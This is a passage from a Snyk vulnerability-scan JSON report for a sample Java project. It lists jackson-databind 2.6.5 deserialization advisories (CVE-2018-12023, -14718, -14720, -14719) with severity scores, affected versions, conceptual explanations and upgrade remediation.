"malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2058", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:47:31.058577Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.092429Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", - "epssDetails": { - "percentile": "0.82708", - "probability": "0.00890", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12023" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6wqp-v4v6-c87c" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:16:09.944095Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:15:50Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
"jackson-databind" - }, - "publicationTime": "2018-10-11T17:15:49Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:43.326081Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - 
"assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.637612Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.92634", - "probability": "0.04626", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14718" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-645p-88qh-w398" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:07.540945Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:19:49Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:19:41Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:22.234808Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - 
"cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.195569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.84205", - "probability": "0.01052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14720" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-x2w5-5m2g-7h5m" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:22.141403Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:20:17Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:19:17Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:33.930153Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", - "title": "GitHub Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.120318Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.85805", - "probability": "0.01269", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14719" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-4gq5-ch57-c2mg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:23:45.326350Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:22:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:22:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.823657Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - 
